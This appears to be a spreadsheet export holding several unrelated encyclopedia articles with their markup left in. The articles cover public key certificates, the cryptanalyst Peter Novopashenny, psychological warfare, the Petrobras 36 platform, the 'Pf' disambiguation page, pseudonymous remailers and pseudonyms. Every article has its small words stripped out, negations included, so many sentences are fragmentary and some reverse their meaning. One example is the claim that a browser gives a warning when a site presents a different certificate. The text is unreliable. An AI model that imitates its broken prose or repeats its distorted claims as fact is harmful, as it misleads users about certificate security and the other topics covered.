certificates common virtual private networks (vpn) remote desktop services, authenticate devices. email certificate accordance s/mime protocol, email certificates establish message integrity encrypt messages. establish encrypted email communication, communicating parties must digital certificates advance. each must send digitally signed email import sender's certificate. some publicly trusted certificate authorities provide email certificates, commonly s/mime used communicating within given organization, organization runs trusted participants email system. self-signed root certificates self-signed certificate certificate subject matches issuer, signature verified public key. purposes, self-signed certificate worthless. however, digital certificate chain trust starts self-signed certificate, called "root certificate," "trust anchor," "trust root." certificate authority self-signs root certificate able sign certificates. intermediate certificate similar purpose root certificate; sign certificates. however, intermediate certificate self-signed. root certificate another intermediate certificate need sign end-entity leaf certificate certificate cannot sign certificates. instance, tls/ssl server client certificates, email certificates, code signing certificates, qualified certificates end-entity certificates. other certificates certificate: payment method based technical standard payment cards, payment terminals automated teller machines (atm). payment cards preloaded card issuer certificate, signed certificate authority validate authenticity payment card payment transaction. code-signing certificate: certificates validate apps binaries) ensure tampered delivery. qualified certificate: certificate identifying individual, typically electronic signature purposes. these commonly used europe, eidas regulation standardizes requires recognition. role-based certificate: defined x.509 certificate policy federal bridge certification authority (fbca), role-based certificates "identify specific role behalf subscriber authorized rather subscriber’s name issued interest supporting accepted business practices." group certificate: defined x.509 certificate policy federal bridge certification authority (fbca), "cases several entities acting capacity, non-repudiation transactions desired." common fields these common fields certificates. most certificates contain number fields listed here. note terms certificate's x.509 representation, certificate "flat" contains fields nested various structures within certificate. serial number: used uniquely identify certificate within ca's systems. particular used track revocation information. subject: entity certificate belongs machine, individual, organization. issuer: entity verified information signed certificate. before: earliest time date certificate valid. usually hours days prior moment certificate issued, avoid clock skew problems. after: time date past certificate longer valid. usage: valid cryptographic uses certificate's public key. common values include digital signature validation, encipherment, certificate signing. extended usage: applications certificate used. common values include server authentication, email protection, code signing. public key: public belonging certificate subject. signature algorithm: this contain hashing algorithm encryption algorithm. example "sha256rsa" sha256 hashing algorithm encryption algorithm. signature: body certificate hashed (hashing algorithm "signature algorithm" field used) hash encrypted (encryption algorithm "signature algorithm" field used) issuer's private key. example this example decoded ssl/tls certificate retrieved ssl.com's website. issuer's common name (cn) shown ssl.com intermediate identifying extended validation (ev) certificate. validated information website's owner (ssl corp) located subject field. x509v3 subject alternative name field contains list domain names covered certificate. x509v3 extended usage x509v3 usage fields show appropriate uses. certificate: data: version: (0x2) serial number: 72:14:11:d3:d7:e0:fd:02:aa:b0:4e:90:09:d4:db:31 signature algorithm: sha256withrsaencryption issuer: c=us, st=texas, l=houston, o=ssl corp, cn=ssl.com intermediate validity before: 22:15:06 2019 after 22:15:06 2021 subject: c=us, st=texas, l=houston, o=ssl corp/serialnumber=nv20081614243, cn=www.ssl.com/postalcode=77098/businesscategory=private organization/street=3100 richmond ave/jurisdictionst=nevada/jurisdictionc=us subject public info: public algorithm: rsaencryption public-key: (2048 bit) modulus: 00:ad:0f:ef:c1:97:5a:9b:d8:1e exponent: 65537 (0x10001) x509v3 extensions: x509v3 authority identifier: keyid:bf:c1:5a:87:ff:28:fa:41:3d:fd:b7:4f:e4:1d:af:a0:61:58:29:bd authority information access: issuers uri:http://www.ssl.com/repository/sslcom-subca-ev-ssl-rsa-4096-r3.crt ocsp uri:http://ocsps.ssl.com x509v3 subject alternative name: dns:www.ssl.com, dns:answers.ssl.com, dns:faq.ssl.com, dns:info.ssl.com, dns:links.ssl.com, dns:reseller.ssl.com, dns:secure.ssl.com, dns:ssl.com, dns:support.ssl.com, dns:sws.ssl.com, dns:tools.ssl.com x509v3 certificate policies: policy: 2.23.140.1.1 policy: 1.2.616.1.113527.2.5.1.1 policy: 1.3.6.1.4.1.38064.1.1.1.5 cps: https://www.ssl.com/repository x509v3 extended usage: client authentication, server authentication x509v3 distribution points: full name: uri:http://crls.ssl.com/sslcom-subca-ev-ssl-rsa-4096-r3.crl x509v3 subject identifier: e7:37:48:de:7d:c2:e1:9d:d0:11:25:21:b8:00:33:63:06:27:c1:5b x509v3 usage: critical digital signature, encipherment precertificate scts: signed certificate timestamp: version (0x0) 87:75:bf:e7:59:7c:f8:8c:43:99 timestamp 22:25:08.574 2019 extensions: none signature ecdsa-with-sha256 30:44:02:20:40:51:53:90:c6:a2 signed certificate timestamp: version (0x0) a4:b9:09:90:b4:18:58:14:87:bb timestamp 22:25:08.461 2019 extensions: none signature ecdsa-with-sha256 30:45:02:20:43:80:9e:19:90:fd signed certificate timestamp: version (0x0) 55:81:d4:c2:16:90:36:01:4a:ea timestamp 22:25:08.769 2019 extensions: none signature ecdsa-with-sha256 30:45:02:21:00:c1:3e:9f:f0:40 signature algorithm: sha256withrsaencryption 36:07:e7:3b:b7:45:97:ca:4d:6c usage european union european union, (advanced) electronic signatures legal documents commonly performed using digital signatures accompanying identity certificates. however, qualified electronic signatures (which require using qualified trust service provider signature creation device) given power physical signature. certificate authorities x.509 trust model, certificate authority (ca) responsible signing certificates. these certificates introduction parties, means acts trusted third party. processes requests people organizations requesting certificates (called subscribers), verifies information, potentially signs end-entity certificate based information. perform role effectively, needs broadly trusted root certificates intermediate certificates corresponding private keys. achieve broad trust root certificates included popular software, obtaining cross-signature another delegating trust. other trusted within relatively small community, like business, distributed mechanisms like windows group policy. certificate authorities also responsible maintaining up-to-date revocation information certificates issued, indicating whether certificates still valid. they provide information online certificate status protocol (ocsp) and/or certificate revocation lists (crls). some larger certificate authorities market include identrust, digicert, sectigo. root programs some major software contain list certificate authorities trusted default. this makes easier end-users validate certificates, easier people organizations request certificates know certificate authorities issue certificate broadly trusted. this particularly important https, site operator generally wants certificate trusted nearly potential visitors site. policies processes provider uses decide certificate authorities software trust called root programs. influential root programs are: microsoft root program apple root program mozilla root program oracle java root program adobe aatl adobe approved trust list eutl root programs (used document signing)browsers firefox generally operating system's facilities decide certificate authorities trusted. instance, chrome windows trusts certificate authorities included microsoft root program, macos ios, chrome trusts certificate authorities apple root program. edge safari respective operating system trust stores well, available single firefox uses mozilla root program trust store platforms. mozilla root program operated publicly, certificate list part open source firefox browser, broadly used outside firefox. instance, common linux root program, many linux distributions, like debian, include package periodically copies contents firefox trust list, used applications. root programs generally provide valid purposes certificates include. instance, considered trusted issuing server certificates, code signing certificates. this indicated trust bits root certificate storage system. website security common certificates https-based sites. browser validates https server authentic, user feel secure his/her interaction site eavesdroppers site claims this security important electronic commerce. practice, site operator obtains certificate applying certificate authority certificate signing request. certificate request electronic document contains site name, company information public key. certificate provider signs request, thus producing public certificate. during browsing, public certificate served browser connects site proves browser provider believes issued certificate owner site. example, user connects https://www.example.com/ browser, browser give certificate warning message, user theoretically sure interacting https://www.example.com/ equivalent interacting entity contact email address listed public registrar "example.com", even though email address displayed anywhere site. surety kind implied. further, relationship purchaser certificate, operator site, generator site content tenuous guaranteed. best, certificate guarantees uniqueness site, provided site compromised (hacked) certificate issuing process subverted. certificate provider issue three types certificates, requiring degree vetting rigor. order increasing rigor (and naturally, cost) are: domain validation, organization validation extended validation. these rigors loosely agreed upon voluntary participants ca/browser forum. validation levels domain validation certificate provider issue domain-validated (dv) certificate purchaser purchaser demonstrate vetting criterion: right administratively manage affected domain(s). organization validation certificate provider issue organization validation (ov) class certificate purchaser purchaser meet criteria: right administratively manage domain name question, perhaps, organization's actual existence legal entity. certificate provider publishes vetting criteria certificate policy. extended validation acquire extended validation (ev) certificate, purchaser must persuade certificate provider legal identity, including manual verification checks human. certificates, certificate provider publishes vetting criteria certificate policy. until 2019, major browsers chrome firefox generally offered users visual indication legal identity site presented certificate. this done showing legal name domain, bright green color highlight change. most browsers deprecated feature providing visual difference user type certificate used. this change followed security concerns raised forensic experts successful attempts purchase certificates impersonate famous organizations, proving inefficiency visual indicators highlighting potential abuses. weaknesses browser give warning user site suddenly presents different certificate, even certificate lower number bits, even different provider, even previous certificate expiry date future. where certificate providers jurisdiction governments, governments freedom order provider generate certificate, purposes enforcement. subsidiary wholesale certificate providers also freedom generate certificate. browsers come extensive built-in list trusted root certificates, many controlled organizations unfamiliar user. each organizations free issue certificate site guarantee browsers include root certificates accept genuine. instance, users must rely developer browser software manage built-in list certificates certificate providers behave correctly inform browser developer problematic certificates. while uncommon, incidents fraudulent certificates issued: cases, browsers detected fraud; others, time passed browser developers removed certificates software.the list built-in certificates also limited provided browser developer: users (and degree applications) free extend list special purposes company intranets. this means someone gains access machine install root certificate browser, browser recognize websites inserted certificate legitimate. provable security, reliance something external system consequence public certification scheme rely special setup assumption, existence certificate authority. usefulness versus unsecured sites spite limitations described above, certificate-authenticated considered mandatory security guidelines whenever site hosts confidential information performs material transactions. this because, practice, spite weaknesses described above, sites secured public certificates still secure unsecured http:// sites. standards national institute standards technology (nist) computer security division provides guidance documents public certificates: 800-32 introduction public technology federal infrastructure 800-25 federal agency public technology digital signatures authentication also authorization certificate pretty good privacy references</t>
  </si>
  <si>
    <t>Peter Novopashenny</t>
  </si>
  <si>
    <t>peter novopashenny (russian: пётр алексеевич новопашенный, pyotr alexeyevich nowopashenny; german: peter novopaschenny) march 1881 russia october 1950 near orsha belarus) world russian marine officer worked cryptanalyst world german wehrmacht (okw/chi) cipher bureau, working russian desk, deciphering enciphered soviet communications.a glacier novaya zemlya, part nordenskiöld glacier group, named him. life after attended naval cadet school 1902, peter novopashenny served naval officer several russian warships, firstly monitor admiral greig (russian: адмирал грейг) 1903 year later battleship sevastopol. russo-japanese (1904-1905), participated battle japanese fleet part. fell japanese captivity, dismissed, however, short time. thereafter served ships gunboat sivuch 1910 graduated nikolaev naval academy petersburg. later, 1913 1915, commanded icebreaker vaygach (russian: вайгач) arctic ocean hydrographic expedition.from 1915 world novopashenny commanded modern novik class destroyer desna (russian: десна). 1916 became commander destroyer "constantine" (russian: константин). services war, awarded imperial russian order saint anna (russian: орденъ святой анны) service (4th stage 1904, stage august 1907, stage november 1915). after october revolution, served briefly soviet navy, took april 1918 centrobalt negotiations german navy baltic fleet helsinki part hangö agreement culminated. shortly thereafter, made break soviet expectant home went exile, first travelling london 1921 germany. spring year, peter novopashenny became acquainted year younger german, wilhelm fenner, born saint petersburg, russia also fluent russian language. immediately off. novopashenny asked fenner help planned move berlin confided successfully worked director russian cryptanalytic service, breaking ciphers german baltic fleet intended provide experiences german general staff. that year, offered course cryptology cryptanalysis wilhelm fenner. novopashenny worked diligently, often late night weeks successful; cipher current russian military attache solved fenner.in autumn 1922, novopashenny fenner officially started employees cipher bureau reichswehr. both stayed employed next decades continued working 1938 founding (okw) high command wehrmacht, working within cipher bureau, okw/chi. while wilhelm fenner eventually became director (german:ministerialrat (min.rat.)) main group peter novopashenny russian desk became successful cryptanalyst, working cryptanalysis soviet radio traffic.after ending war, arrested soviet secret agents town ringleben thuringia autumn 1945 detained later interrogated 1946 berlin. died 1950, camp near belarusian city orsha. references external links german-russian treaty helsinki (english translation) signed novopaschenny. accessed: august 2016</t>
  </si>
  <si>
    <t>Psychological warfare</t>
  </si>
  <si>
    <t>psychological warfare (psywar), basic aspects modern psychological operations (psyop), known many names terms, including military information support operations (miso), ops, political warfare, "hearts minds", propaganda. term used denote action practiced mainly psychological methods evoking planned psychological reaction people".various techniques used, aimed influencing target audience's value system, belief system, emotions, motives, reasoning, behavior. used induce confessions reinforce attitudes behaviors favorable originator's objectives, sometimes combined black operations false flag tactics. also used destroy morale enemies tactics depress troops' psychological states.target audiences governments, organizations, groups, individuals, limited soldiers. civilians foreign territories also targeted technology media cause effect government country.there evidence psychological warfare throughout written history. modern times, psychological warfare efforts used extensively. mass communication allows direct communication enemy populace, therefore used many efforts. social media channels internet allow campaigns disinformation misinformation performed agents anywhere world. history early since prehistoric times, warlords chiefs recognized importance weakening morale opponents. battle pelusium (525 persian empire ancient egypt, persian forces used cats animals psychological tactic egyptians, avoided harming cats religious belief spells. currying favor supporters side psychological warfare, early practitioner alexander great, successfully conquered large parts europe middle east held territorial gains co-opting local elites greek administration culture. alexander left behind conquered city introduce greek culture oppress dissident views. soldiers paid dowries marry locals effort encourage assimilation. genghis khan, leader mongolian empire 13th century employed less subtle techniques. defeating enemy attack reaching consented settlement preferable facing wrath. mongol generals demanded submission khan threatened initially captured villages complete destruction refused surrender. fight take settlement, mongol generals fulfilled threats massacred survivors. tales encroaching horde spread next villages created aura insecurity undermined possibility future resistance.genghis khan also employed tactics made numbers seem greater actually were. during night operations ordered soldier light three torches dusk give illusion overwhelming army deceive intimidate enemy scouts. also sometimes objects tied tails horses, riding open fields raised cloud dust gave enemy impression great numbers. soldiers used arrows specially notched whistle flew air, creating terrifying noise.another tactic favored mongols catapulting severed human heads city walls frighten inhabitants spread disease besieged city's closed confines. this especially used later turko-mongol chieftain. muslim caliph omar, battles byzantine empire, sent small reinforcements form continuous stream, giving impression large force would accumulate eventually swiftly dealt with. during early dynasty late eastern zhou dynasty century china, empty fort strategy used trick enemy believing empty location ambush, order prevent attacking using reverse psychology. this tactic also relied luck, enemy believe location threat them. century greek bias priene successfully resisted lydian king alyattes fattening pair mules driving besieged city. when alyattes' envoy sent priene, bias piles sand covered wheat give impression plentiful resources. this ruse appears well known medieval europe: defenders castles towns siege would throw food walls show besiegers provisions plentiful. famous example occurs 8th-century legend lady carcas, supposedly persuaded franks abandon five-year siege means gave name carcassonne result. during attack marstrand, peter tordenskjold carried military deception swedes. although probably apocryphal, apparently succeeded making small force appear larger feed disinformation opponents, similar operations fortitude titanic world modern world start modern psychological operations generally dated world point, western societies increasingly educated urbanized, mass media available form large circulation newspapers posters. also possible transmit propaganda enemy airborne leaflets explosive delivery systems like modified artillery mortar rounds.at start war, belligerents, especially british germans, began distributing propaganda, domestically western front. british several advantages allowed succeed battle world opinion; world's reputable news systems, much experience international cross-cultural communication, controlled much undersea cable system operation. these capabilities easily transitioned task warfare. british also diplomatic service maintained good relations many nations around world, contrast reputation german services. while german attempts foment revolution parts british empire, ireland india, ineffective, extensive experience middle east allowed british successfully induce arabs revolt ottoman empire. august 1914, david lloyd george appointed member parliament (mp), charles masterman, head propaganda agency wellington house. distinguished body literary talent enlisted task, members including arthur conan doyle, ford madox ford, chesterton, thomas hardy, rudyard kipling wells. over 1,160 pamphlets published distributed neutral countries, eventually, germany. first significant publications, report alleged german outrages 1915, great effect general opinion across world. pamphlet documented atrocities, actual alleged, committed german army belgian civilians. dutch illustrator, louis raemaekers, provided highly emotional drawings appeared pamphlet.in 1917, bureau subsumed department information branched telegraph communications, radio, newspapers, magazines cinema. 1918, viscount northcliffe appointed director propaganda enemy countries. department split propaganda germany organized wells, propaganda austro-hungarian empire supervised wickham steed robert william seton-watson; attempts latter focused lack ethnic cohesion empire stoked grievances minorities croats slovenes. significant effect final collapse austro-hungarian army battle vittorio veneto.aerial leaflets dropped german trenches containing postcards prisoners detailing humane conditions, surrender notices general propaganda kaiser german generals. war, mi7b distributed almost million leaflets. germans began shooting leaflet-dropping pilots, prompting british develop unmanned leaflet balloons drifted across no-man's land. least seven leaflets handed soldiers superiors, despite severe penalties offence. even general hindenburg admitted "unsuspectingly, many thousands consumed poison", pows admitted disillusioned propaganda leaflets depicted german troops mere cannon fodder. 1915, british began airdropping regular leaflet newspaper courrier l'air civilians german-occupied france belgium.at start war, french government took control media suppress negative coverage. only 1916, establishment maison presse, begin similar tactics purpose psychological warfare. sections "service propagande aérienne" (aerial propaganda service), headed professor tonnelat jean-jacques waltz, alsatian artist code-named "hansi". french tended distribute leaflets images only, although full publication president woodrow wilson's fourteen points, heavily edited german newspapers, distributed airborne leaflets french.the central powers slow techniques; however, start germans succeeded inducing sultan ottoman empire declare 'holy war', jihad, western infidels. they also attempted foment rebellion british empire places afield ireland, afghanistan, india. germans' greatest success giving russian revolutionary, lenin, free transit sealed train switzerland finland overthrow tsar. this soon paid bolshevik revolution took russia war. world adolf hitler greatly influenced psychological tactics warfare british employed world attributed defeat germany effects propaganda soldiers. became committed mass propaganda influence minds german population decades come. calling movement third reich, able convince many civilians cause fad, future. joseph goebbels appointed propaganda minister hitler came power 1933, portrayed hitler messianic figure redemption germany. hitler also coupled resonating projections orations effect. germany's fall grün plan invasion czechoslovakia large part dealing psychological warfare aimed czechoslovak civilians government well crucially, czechoslovak allies. became successful point germany gained support france appeasement occupy czechoslovakia without fight all-out war, sustaining minimum losses covert munich agreement. start second world war, british political warfare executive produce distribute propaganda. through powerful transmitters, broadcasts could made across europe. sefton delmer managed successful black propaganda campaign several radio stations designed popular german troops time introducing news material would weaken morale veneer authenticity. british prime minister winston churchill made radio broadcasts propaganda germans. during world british made extensive deception developing many techniques theories. main protagonists time force, 1940 dudley clarke, london controlling section, chartered 1942 control john bevan. clarke pioneered many strategies military deception. ideas combining fictional orders battle, visual deception double agents helped define allied deception strategy war, referred "the greatest british deceiver ww2".during lead allied invasion normandy, many tactics psychological warfare devised. plan operation bodyguard general strategy mislead german high command exact date location invasion. planning began 1943 auspices london controlling section (lcs). draft strategy, referred plan jael, presented allied high command tehran conference. operation fortitude intended convince germans greater allied military strength existed, fictional field armies, faked operations prepare ground invasion leaked information allied order battle plans. elaborate naval deceptions (operations glimmer, taxable drum) undertaken english channel. small ships aircraft simulated invasion fleets lying calais, d'antifer western flank real invasion force. time operation titanic involved dropping fake paratroopers east west normandy landings. deceptions implemented double agents, radio traffic visual deception. british "double cross" anti-espionage operation proven successful outset war, able double agents send back misleading information allied invasion plans. visual deception, including mock tanks military hardware developed north africa campaign. mock hardware created bodyguard; particular, dummy landing craft stockpiled give impression invasion would take place near calais. operation strategic success normandy landings caught german defences unawares. subsequent deception hitler delaying reinforcement calais region nearly seven weeks. vietnam united states extensive program psychological warfare vietnam war. phoenix program dual assassinating national liberation front south vietnam (nlf viet cong) personnel terrorizing potential sympathizers passive supporters. chieu program south vietnam government promoted defections. when members assassinated, special forces operatives placed playing cards mouth deceased calling card. during phoenix program, 19,000 supporters killed. united states also used tapes distorted human sounds played night making vietnamese soldiers think dead back revenge. recent operations made extensive contra soldiers destabilize sandinista government nicaragua. used psychological warfare techniques panamanians delivering unlicensed broadcasts. united states government used propaganda broadcasts cuban government marti, based miami, florida. however, cuban government successful jamming signal marti. iraq war, united states used shock campaign psychologically maim break iraqi army fight. cyberspace, social media enabled disinformation wide scale. analysts found evidence doctored misleading photographs spread social media syrian civil 2014 russian military intervention ukraine, possibly state involvement. military governments engaged psychological operations (psyop) informational warfare (io) social networking platforms regulate foreign propaganda, includes countries like russia, china.in operations south east china seas, united states china engaged "cognitive warfare", involves displays force, staged photographs sharing disinformation. methods most modern uses term psychological warfare refer following military methods: demoralization: distributing pamphlets encourage desertion supply instructions surrender shock military strategy projecting repetitive disturbing noises music long periods high volume towards groups siege like operation nifty package tolerance indoctrination, totems culture defeated enemy removed replaced without conflict. propaganda radio stations, lord haw-haw world "germany calling" station renaming cities places captured, renaming saigon minh city communist victory vietnam false flag events loudspeaker systems communicate enemy soldiers terrorism threat chemical weapons information warfaremost techniques developed world earlier, used degree every conflict since. daniel lerner (the predecessor american cia) book, attempts analyze effective various strategies were. concludes little evidence dramatically successful, except perhaps surrender instructions loudspeakers victory imminent. measuring success failure psychological warfare hard, conditions controlled experiment. lerner also divides psychological warfare operations three categories: white propaganda (omissions emphasis): truthful strongly biased, source information acknowledged. grey propaganda (omissions, emphasis racial/ethnic/religious bias): largely truthful, containing information proven wrong; source identified. black propaganda (commissions falsification): inherently deceitful, information given product attributed source responsible creation.lerner says grey black operations ultimately heavy cost, target population sooner later recognizes propaganda discredits source. writes, "this dogmas advanced sykewarriors likely endure axiom propaganda: credibility condition persuasion. before make say, must make believe say.": consistent idea, allied strategy world predominantly truth (with certain exceptions). propaganda: formation men's attitudes, jacques ellul discusses psychological warfare common peace policy practice nations form indirect aggression. this type propaganda drains public opinion opposing regime stripping away power public opinion. this form aggression hard defend international court justice capable protecting psychological aggression since cannot legally adjudicated. "here propagandists [sic] dealing foreign adversary whose morale seeks destroy psychological means opponent begins doubt validity beliefs actions." country china according u.s. military analysts, attacking enemy’s mind important element people's republic china's military strategy. this type warfare rooted chinese stratagems outlined thirty-six stratagems. dealings rivals, china expected utilize marxism mobilize communist loyalists, well flex economic military muscle persuade nations china's interests. chinese government also tries control media keep tight hold propaganda efforts people. france centre interarmées actions l’environnement organization made soldiers whose mission assure four service french armed forces psychological warfare capacities. deployed particular mali afghanistan, missions consist better explaining accepting action french forces operation local actors thus gaining trust: direct populations, management reconstruction sites, actions communication influence population, elites local elected officials center capacities analysis, influence, expertise instruction. germany german bundeswehr, zentrum operative information subordinate bataillon operative information responsible psyop efforts (called operative information german). both center battalion subordinate streitkräftebasis (joint services support command, skb) together consist 1,200 soldiers specialising modern communication media technologies. project german psyop forces radio station stimme freiheit (sada-e azadi, voice freedom), heard thousands afghans. another publication various newspapers magazines kosovo afghanistan, german soldiers serve nato. russia soviet union united kingdom british first major military powers psychological warfare first second world wars. current british armed forces, psyops handled tri-service psychological operations group. (see also secret intelligence service). psychological operations group comprises personnel, approximately regular armed services reserves. group supports deployed commanders provision psychological operations operational tactical environments.the group established immediately 1991 gulf war, since grown significantly size meet operational requirements, 2015 sub-units 77th brigade, formerly called security assistance group.in june 2015, files published glenn greenwald revealed details jtrig group british intelligence agency gchq covertly manipulating online communities. this line jtrig's goal: "destroy, deny, degrade [and] disrupt" enemies "discrediting" them, planting misinformation shutting communications.in march 2019, emerged defence science technology laboratory (dstl) uk's ministry defence (mod) tendering arms companies universities £70m worth assistance project develop methods psychological warfare. project known human social sciences research capability (hssrc). united states term psychological warfare believed migrated germany united states 1941. during world united states joint chiefs staff defined psychological warfare broadly, stating "psychological warfare employs weapon influence mind enemy. weapons psychological effect produce weapons themselves." u.s. department defense currently defines psychological warfare "the planned propaganda psychological actions primary purpose influencing opinions, emotions, attitudes, behavior hostile foreign groups support achievement national objectives." this definition indicates critical element u.s. psychological operations capabilities includes propaganda extension counterpropaganda. joint publication 3–53 establishes specific policy public affairs mediums counter propaganda foreign origins.the purpose united states psychological operations induce reinforce attitudes behaviors favorable objectives. special activities center (sac) division central intelligence agency's national clandestine service, responsible covert action "special activities". these special activities include covert political influence (which includes psychological operations) paramilitary operations. sac's political influence group unit allowed conduct operations covertly considered primary unit area.dedicated psychological operations units exist united states army united states marine corps. united states navy 193rd special operations wing united states force also plans executes limited psyop missions. united states psyop units soldiers branches military prohibited targeting u.s. citizens psyop within borders united states (executive order s-1233, directive s-3321.1, national security decision directive 130). while united states army psyop units offer non-psyop support domestic military missions, target foreign audiences. u.s. army field manual released january 2013 states "inform influence activities" critical describing, directing, leading military operations. several army division leadership staff assigned “planning, integration synchronization designated information-related capabilities." also references bibliography external links movie: psywar: real battlefield mind metanoia films paul myron anthony linebarger. psychological warfare project gutenberg history psychological warfare psychological operations (psyops) influence operations archived december 2010 wayback machine "pentagon psychological warfare operation", today, december 2005 "u.s. adapts cold-war idea fight terrorists", york times, march 2008 army psyops info detailed information army psychological operation soldiers information warfare site archived december 2010 wayback machine u.s. psyop producing mid-eastern kids comic book institute heraldry psychological operations psychological warfare nature psychological warfare (cia 1958) original</t>
  </si>
  <si>
    <t>Petrobras 36</t>
  </si>
  <si>
    <t>petrobras (p-36) time largest floating semi-submersible platform world prior sinking march 2001. owned petrobras, semi-public brazilian company headquartered janeiro. cost platform us$350 million (currently us$536 million).the vessel built fincantieri shipyard genoa, italy 1995 drilling rig. owned società armamento navi appoggio s.p.a. 33,000 tonnes (36,000 short tons) converted davie industry, lévis, canada world's largest production platform. p-36 operating petrobras roncador field, kilometres brazilian coast, producing 84,000 barrels (13,400 crude day.p-36 replaced fpso-brasil leased vessel offshore. fpso-brasil started lease contract petrobras december 2002. 2007, p-52 platform (fpso p-52) built singapore brazil came operation. accident early hours march 2001 explosions starboard column around emergency drain tank. first explosion caused overpressure event, second ignition leaking hydrocarbon vapor. time people rig; killed. following explosions, developed list, sufficient allow down-flooding submerged fairlead boxes.marine salvage teams tried weekend save platform pumping nitrogen compressed tanks expel water, abandoned weather.the platform sank five days explosions (march 20), 1,200 (3,940 water estimated 1,500 tonnes (1,700 short tons) crude remaining board. also industrial disasters references external links article nasa safety center report sinking petrobras p-36 photographs platform's sinking. sustainability case study costs sinking. petrobras project images p-36 article offshore sinking sequence</t>
  </si>
  <si>
    <t>Pf</t>
  </si>
  <si>
    <t>refer arts entertainment pianoforte, full original name piano instrument project fanboy, comic book news website businesses flyers, brand shoes palestinian airlines (iata airline designator), defunct airline pell frischmann, multi-disciplinary engineering consultancy economics finance point figure chart technical analysis securities pfennig, unit currency formerly used germany, symbol provident fund (disambiguation), name various pension funds language phonetic form, level syntactic representation linguistics voiceless labiodental affricate (⟨p̪͡f⟩, ⟨p̪͜f⟩, ⟨p̪f⟩), type consonant sound (digraph), german digraph organizations pheasants forever, non-profit habitat conservation organization federal police department (polícia federal), brazil patients' front, late 1960s early 1970s west german pro-illness movement south vietnamese popular force, local defense militia formed south vietnam vietnam patriotic front (disambiguation), name political party several countries places paracel islands, fips 10-4 territory code french polynesia (polynésie française), 3166 code .pf, internet country code french polynesia pforzheim enzkreis district, germany (vehicle plate code science technology computing .pf, internet country code french polynesia (firewall), openbsd's stateful packet filter keys, type function keys keyboards page fault, type exception (error) computer programming page file, file used extension computer memory physics power factor, phi, electric power system purple fringing, type chromatic aberration photography phenol formaldehyde resin, earliest synthetic polymer picofarad (pf) petafarad (pf), multiples farad, unit electric capacitance photon factory, synchrotron located tsukuba, japan sciences mathematics pf(a), pfaffian matrix phenylphosphine, organophosphorus compound plasmodium falciparum, species plasmodium causes malaria humans polar front, meteorology position fix, position derived measuring external reference points psychometric function, inferential psychometric model sports personal foul (disambiguation), type foul several sports power forward (disambiguation), type position several sports other uses united states navy hull classification symbol patrol frigate peregrine falcons squad, faction metal slug series video games pilot flying, commercial aviation, designation pilot control aircraft pour féliciter, text year card procurator fiscal, public prosecutor scotland public forum debate, debate sanctioned national forensic league pekoe fannings, grade leaves horowitz index (pf), blood oxygenation also (disambiguation)</t>
  </si>
  <si>
    <t>Pseudonymous remailer</t>
  </si>
  <si>
    <t>pseudonymous remailer server, opposed anonymous remailer, internet software program designed allow people write pseudonymous messages usenet newsgroups send pseudonymous email. unlike purely anonymous remailers, assigns users user name, keeps database instructions return messages real user. these instructions usually involve anonymous remailer network itself, thus protecting true identity user. primordial pseudonymous remailers recorded enough information trace identity real user, making possible someone obtain identity real user legal illegal means. this form pseudonymous remailer longer common. david chaum wrote article 1981 described many features present modern pseudonymous remailers.the penet remailer, lasted 1993 1996, popular pseudonymous remailer. contemporary servers server (short "pseudonym server") server provides untraceable e-mail address, neither server operator operators remailers involved discover corresponds real identity. nym, create keypair submit server, along instructions (called reply block) anonymous remailers (such cypherpunk mixmaster) send message real address. server returns confirmation reply block. send message address confirmation. send message server from address nym, headers, sign message key, encrypt server key, send message server, probably routed anonymous remailers. when server gets message, decrypts message sends intended recipient, from: address nym. when server gets message addressed nym, appends nym's reply block sends first remailer chain, sends next reaches real address. considered good practice include instructions encrypt way, someone organization) in/out traffic analysis server cannot easily match message received sent server. existing "multi-use reply block" servers shown susceptible passive traffic analysis month's worth incoming spam (based 2005 figures) paper bram cohen, sassaman, nick mathewson. also anonymity anonymous anonymous remailer cypherpunk anonymous remailer (type mixmaster anonymous remailer (type mixminion (type iii) i2p-bote onion routing (network) data privacy penet remailer traffic analysis references further reading bruce schneier. email security. isbn 0-471-05318-x. bacard, andre. computer privacy handbook. isbn 1-56609-171-3. external links anonymous remailer mixmaster official i2p-bote eepsite (i2p-internal)</t>
  </si>
  <si>
    <t>Pseudonym</t>
  </si>
  <si>
    <t>pseudonym ancient greek ψευδώνυμος (pseudṓnumos) 'falsely named') alias fictitious name person group assumes particular purpose, differs original true name (orthonym). this also differs name entirely legally replaces individual's own. most pseudonym holders pseudonyms wish remain anonymous, anonymity difficult achieve often fraught legal issues. scope pseudonyms include stage names, user names, ring names, names, aliases, superhero villain identities code names, gamer identifications, regnal names emperors, popes, monarchs. cases, also include nicknames. historically, sometimes taken form anagrams, graecisms, latinisations, although many methods choosing pseudonym.pseudonyms confused names replace ones become individual's full-time name. pseudonyms "part-time" names, used certain contexts provide clear-cut separation one's private professional lives, showcase enhance particular persona, hide individual's real identity, writers' names, graffiti artists' tags, resistance fighters' terrorists' noms guerre, computer hackers' handles. actors, voice-over artists, musicians, performers sometimes stage names, example, better channel relevant energy, gain greater sense security comfort privacy, easily avoid troublesome fans/"stalkers", mask ethnic backgrounds. cases, pseudonyms adopted part cultural organisational tradition: example devotional names used members religious institutes, "cadre names" used communist party leaders trotsky lenin. collective name collective pseudonym shared persons, example co-authors work, carolyn keene, erin hunter, ellery queen, nicolas bourbaki, james corey. etymology term pseudonym derived greek word "ψευδώνυμον" (pseudṓnymon), literally 'false name', ψεῦδος (pseûdos) 'lie, falsehood' ὄνομα (ónoma) 'name'. term alias latin adverb meaning another time, elsewhere'. usage name change sometimes people change names manner name becomes permanent used know person. this alias pseudonym, fact name. many countries, including common countries, name change ratified court become person's legal name. example, 1960s, civil rights campaigner malcolm originally known malcolm little, changed surname represent unknown african ancestral name lost ancestors brought north america slaves. changed name malik el-shabazz converted islam.likewise jews adopted hebrew family names upon immigrating israel, dropping surnames families generations. politician david ben-gurion, example, born david grün poland. adopted hebrew name 1910 published first article zionist journal jerusalem. concealing identity business businesspersons ethnic minorities parts world sometimes advised employer pseudonym common acceptable area conducting business, overcome racial religious bias. criminal activity criminals aliases, fictitious business names, dummy corporations (corporate shells) hide identity, impersonate persons entities order commit fraud. aliases fictitious business names used dummy corporations become complex that, words washington post, "getting truth requires walk bizarre labyrinth" multiple government agencies become involved uncover truth. giving false name enforcement officer crime many jurisdictions; identity fraud. literature name, plume (french "pen name"), pseudonym (sometimes particular form real name) adopted author author's behalf publishers). although term frequently used today regard identity internet, concept pseudonymity long history. ancient literature common write name famous person, concealment intention deceit; testament, second letter peter probably such. modern example federalist papers, signed publius, pseudonym representing trio james madison, 